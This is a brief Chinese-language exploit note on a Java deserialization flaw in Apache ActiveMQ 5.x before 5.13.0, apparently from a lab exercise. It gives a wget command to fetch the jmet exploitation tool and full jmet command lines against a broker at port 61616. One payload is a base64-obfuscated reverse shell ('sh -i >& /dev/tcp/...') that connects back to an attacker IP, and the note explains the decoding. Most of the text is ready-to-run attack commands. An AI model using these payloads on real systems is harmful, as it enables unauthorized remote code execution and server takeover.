1.描述
- Apache ActiveMQ 5.13.0以前的5.x版本
- 一个java反序列化漏洞
2.原理
- 允许远程攻击者通过精心设计的序列化Java消息服务(JMS)ObjectMessage对象执行任意代码
3.EXP
- jmet,一款java反序列化利用工具。(java版本:java-11-openjdk-amd64)
- java -jar jmet-0.1.0-all.jar -Q myevent -I ActiveMQ -s -Y “touch /tmp/success” -Yp ROME 192.168.76.138 61616
- #jmet-0.1.0-all.jar:
- wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
#同目录下必须得有external文件夹:mkdir external
4.POC
1."touch /tmp/success" --- > "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC43Ni4xMzUvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}"
2.java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC43Ni4xMzUvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.76.138 61616
3.“c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC43Ni4xMzUvMTIzNCAwPiYx”是"sh -i >& /dev/tcp/192.168.76.135/1234 0>&1"经过base64编码后的
